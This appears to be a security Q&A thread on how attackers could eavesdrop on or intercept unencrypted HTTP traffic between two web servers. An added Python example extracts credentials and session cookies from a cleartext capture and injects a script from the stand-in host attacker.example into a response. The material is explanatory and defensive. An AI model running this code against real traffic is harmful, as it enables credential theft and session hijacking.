
I’m new to security, and I’m wondering how man-in-the-middle and eavesdropping attacks between web servers work, rather than between personal devices and servers.

Most questions I see here about man-in-the-middle attacks seem to involve a personal Web browser communicating with a server over an insecure Internet connection. If they’re using unencrypted HTTP over something like public wi-fi, then it’s really easy to intercept and read their communications from packets that they broadcast on the same network, as Firesheep shows.

But how would an attacker perform an attack on the connection between two public Internet servers communicating over unencrypted HTTP?

I know that if HTTP messages aren’t encrypted, man-in-the-middle and eavesdropping attacks can occur. But I’m wondering about actual risk, feasibility, and practicality of such an attack.

Let’s say that there are two servers, A and B.
Server A is a VPS or something, from Rackspace or Linode, under your control.
Server B is another organization’s public web server that is not under your control.
Server B does not support HTTPS; it requires HTTP and session cookies.
Server A needs to intermittently connect to server B on server B’s website: logging in, doing things, logging out.
Server A’s IP address might or might not be public—it’s exposed to server B, in any case. Server B’s IP address is public.

How would an attacker eavesdrop or intercept this connection if they had the resources of an individual? It’s not like the VPS uses a public local network to which individuals could connect.

The big thing I can think of is that an attacker might launch a DNS-spoofing attack against the DNS servers of the VPS company that hosts server A. So you’d have to trust that the VPS company’s DNS servers won’t get compromised, right? Is this required trust recursive to servers outside the organization, all the way to the root server? What kind of resources would an attacker need to attack these servers?

Are there any other methods that a man-in-the-middle or eavesdropping attack might occur between these two servers? What resources would those also require?

There are some other questions about man-in-the-middle attack techniques other than wi-fi interception—although they are broader than this question, which is specifically about unencrypted HTTP between two hosted servers. These other questions include:

user3842252
  • What if one of the routers on the path between the two servers gets compromised? For example a rogue employee or a breach at an ISP that allows malicious people to log into the routers? – André Borie Mar 11 '16 at 21:51
  • @AndréBorie That could be a possibility, though being able to compromise the ISPs of either server A or B would probably be unlikely for random people. I don't have a sense of how feasible different types of attacks such as this, DNS spoofing, packet sniffing, etc. might be. As long as I secure my own VPS (server A) well, a random person elsewhere who wishes to deliberately target me would have a difficult time determining which routers are involved on the path between the two servers…or would they? – user3842252 Mar 12 '16 at 03:54

2 Answers


Something I've seen before, and that is talked about in a DefCon talk, is that people will set up a proxy on something like your VPS in the example and capture the traffic between the user and the server that's going through the proxy. They could also choose to inject JavaScript or return false data to you if they so desired.

For an attacker to sniff all of the traffic going to a web server, they would need to have remote access to it, or to the network it's on at the very least. They'd also need to be able to transfer the collected data to themselves. I've heard of hackers commonly using VPSs to hide their identity whenever they've cracked into a web server and are attempting to perform such attacks. This might be where you've got this from.

As for the resources that would be required: a packet sniffer such as Wireshark would work. An exploit for a vulnerability on the web server would be needed as well.

xorist
  • Thanks for answering. Both this answer and the other answer seem to require that the attacker gain shell access to server A or B. Assuming that this is particularly unlikely, are there other ways to eavesdrop that are feasible for non-nation-state attackers (e.g., individual attackers) that do not rely on shell access to server A or B (e.g., DNS spoofing)? – user3842252 Mar 12 '16 at 03:45
  • Access doesn't necessarily have to be from a shell. There are many vectors of attack a hacker may use to obtain access to a server. – xorist Mar 12 '16 at 03:46
  • Yes, but now you're usually getting into more advanced types of attacks you'll only find if you're a dedicated 0day attack researcher, or you run an underground hacking mob. – xorist Mar 12 '16 at 03:47
  • The attacker doesn't necessarily need access to Server A or Server B. If the communication is unencrypted, and the attacker has access to any other server that is in the same network segment (e.g. an admin computer), they still may be able to MitM traffic through various other network means (e.g. ARP spoofing). – Casey Mar 14 '16 at 18:10
  • This is true if you're on the same local network. Please re-read his question. The scenario he had as an example doesn't include the attacker being on the same local network as the victim. – xorist Mar 14 '16 at 18:11
  • But I understand what you mean. Thank you for your input, I'll revise my answer. – xorist Mar 14 '16 at 18:17

As an attacker, if there is a vulnerability that would allow me to gain access to Server A (always assume an attacker can gain root access if they can get a restricted shell on the server), then I would be able to sniff the network traffic from Server A to Server B, e.g. using tcpdump. Anything sent over HTTP will be clear text.

Casey
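As an added example (not code from either answer or from the original post), the following Python shows concretely what the two answers describe: the passive case, where someone with a packet capture on a compromised Server A (Casey's tcpdump scenario) pulls the login credentials and the session cookie out of the cleartext HTTP session the question describes, and the active case, where a proxy placed on the path (xorist's scenario) injects a script tag into an HTML response from Server B. All traffic below is constructed sample data; the host names `serverb.example` and `attacker.example`, the cookie name `sessionid` and the script URL are placeholders, not real systems.

```python
"""Added example, not code from either answer: what an eavesdropper with a
packet capture on Server A extracts from a cleartext HTTP session, and how
an on-path proxy tampers with a response to inject JavaScript. All data is
constructed; host names, cookie name and script URL are placeholders."""
from urllib.parse import parse_qsl
import re

# Constructed capture: Server A logs in to Server B, is issued a session
# cookie, then replays it on the next request. This is the payload stream that
# `tcpdump -A 'tcp port 80'` on a compromised Server A (or any hop on the
# path) would print; TCP reassembly is assumed to have been done already.
CAPTURED_STREAM = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: serverb.example\r\n"                        # placeholder host
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 36\r\n"
    b"\r\n"
    b"username=automation&password=s3cret!"            # 36 bytes, no CRLF
    b"HTTP/1.1 302 Found\r\n"
    b"Set-Cookie: sessionid=abc123def456; Path=/; HttpOnly\r\n"
    b"Location: /dashboard\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
    b"GET /dashboard HTTP/1.1\r\n"
    b"Host: serverb.example\r\n"
    b"Cookie: sessionid=abc123def456\r\n"
    b"\r\n"
)


def split_messages(stream: bytes):
    """Split a concatenated stream of HTTP/1.1 messages into
    (start_line, headers, body) tuples. Bodies are delimited by
    Content-Length only (no chunked encoding), and repeated headers keep
    only the last value; both are fine for the constructed sample."""
    messages, pos = [], 0
    while pos < len(stream):
        end = stream.index(b"\r\n\r\n", pos)
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        messages.append((lines[0], headers, stream[body_start:body_start + length]))
        pos = body_start + length
    return messages


def extract_secrets(stream: bytes) -> dict:
    """Passive eavesdropping: pull form credentials, issued session cookies
    and cookies replayed on later requests out of a cleartext capture."""
    found = {"credentials": {}, "set_cookies": [], "cookies_sent": []}
    for _start_line, headers, body in split_messages(stream):
        if "x-www-form-urlencoded" in headers.get("content-type", ""):
            found["credentials"].update(parse_qsl(body.decode("latin-1")))
        if "set-cookie" in headers:  # keep name=value, drop Path/HttpOnly attributes
            found["set_cookies"].append(headers["set-cookie"].split(";", 1)[0])
        if "cookie" in headers:
            found["cookies_sent"].append(headers["cookie"])
    return found


def inject_script(response: bytes, script_src: str) -> bytes:
    """Active tampering by an on-path proxy: add a <script> tag to an HTML
    response and rewrite Content-Length so the client parses it normally."""
    head, sep, body = response.partition(b"\r\n\r\n")
    tag = f'<script src="{script_src}"></script>'.encode()
    if b"</body>" in body:
        body = body.replace(b"</body>", tag + b"</body>", 1)
    else:
        body += tag
    # Fix the length header in place; a chunked response would need re-chunking instead.
    head = re.sub(rb"(?im)^content-length:\s*\d+", b"Content-Length: %d" % len(body), head)
    return head + sep + body


# Constructed response from Server B, as the proxy sees it before tampering.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 28\r\n"
    b"\r\n"
    b"<html><body>hi</body></html>"
)

if __name__ == "__main__":
    print(extract_secrets(CAPTURED_STREAM))
    print(inject_script(SAMPLE_RESPONSE, "http://attacker.example/x.js").decode())
```

The point of the passive half is that nothing in the script is clever: with HTTP there is no decryption step, so the credentials and the `sessionid` cookie are literally sitting in the bytes, and the same cookie is replayed on every later request, which is what makes it reusable by whoever captured it. The active half shows why an on-path attacker's position is stronger than a passive sniffer's: a single byte-level rewrite (plus a corrected `Content-Length`) is enough to make Server A fetch and run attacker-controlled content, and with no TLS there is nothing on either end to detect the change.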